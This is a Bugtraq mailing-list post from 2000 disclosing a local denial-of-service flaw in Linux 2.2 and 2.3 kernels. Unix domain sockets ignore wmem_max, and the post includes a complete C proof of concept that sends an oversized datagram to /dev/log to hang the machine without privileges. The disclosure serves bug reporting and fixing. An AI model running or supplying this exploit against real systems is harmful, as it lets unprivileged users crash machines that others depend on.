Bugtraq mailing list archives
Local Denial-of-Service attack against Linux
From: fenlason () CLEARWAY COM (Jay Fenlason)
Date: Thu, 23 Mar 2000 17:55:09 -0500
This amusing little program will hang Linux 2.2.12 (default Red Hat 6.1), 2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest development kernel) on my 6x86 scratch machine and our various Pentium development machines. Note that this does not require any special privileges. The send system call immediately puts the kernel in a loop spewing kmalloc: Size (131076) too large forever (or until you hit the reset button). Apparently unix domain sockets are ignoring the /proc/sys/net/core/wmem_max parameter, despite the documentation to the contrary. The fix should be simple, but I haven't had time to chase it down, and I'm not (usually) a Linux kernel developer. -- JF --- BEGIN INCLUDED SOURCE FILE --- #include <sys/types.h> #include <sys/socket.h> #include <string.h> char buf[128 * 1024]; int main ( int argc, char **argv ) { struct sockaddr SyslogAddr; int LogFile; int bufsize = sizeof(buf)-5; int i; for ( i = 0; i < bufsize; i++ ) buf[i] = ' '+(i%95); buf[i] = '\0'; SyslogAddr.sa_family = AF_UNIX; strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) ); LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 ); sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) ); return 0; } --- END INCLUDED SOURCE FILE ---
Current thread:
- gpm-root egmont () FAZEKAS HU (Mar 22)
- Re: gpm-root ADAM Sulmicki (Mar 22)
- Trend Micro releases Patch for "OfficeScan Unauthenticated CGI U sage" vulnerability Richard Sheng (Mar 22)
- Re: gpm-root Koblinger Egmont (Mar 23)
- Local Denial-of-Service attack against Linux Jay Fenlason (Mar 23)
- Re: Local Denial-of-Service attack against Linux Michal Zalewski (Mar 24)
- Re: Local Denial-of-Service attack against Linux dapozza (Mar 24)
- Hide Drives does not work with OUTLOOK 98 - Summary of Answers (W InNT4) DeAvillez, Carlos (Mar 24)
- Windows 2000 Internet Server Security Configuration Tool Microsoft Security Response Center (Mar 24)
- Irix Objectserver remote exploit Marcy Abene (Mar 29)
- New ZZ v1.2 Simple Nomad (Mar 29)
- [RHSA-2000:008-01] ircii buffer overflow bugzilla () REDHAT COM (Mar 30)
- Microsoft Security Bulletin (MS00-019) Microsoft Product Security (Mar 30)
- Microsoft Security Bulletin (MS00-021) Microsoft Product Security (Mar 30)
- Napster, Inc. response to Colten Edwards Elias Levy (Mar 30)
- Re: gpm-root ADAM Sulmicki (Mar 22)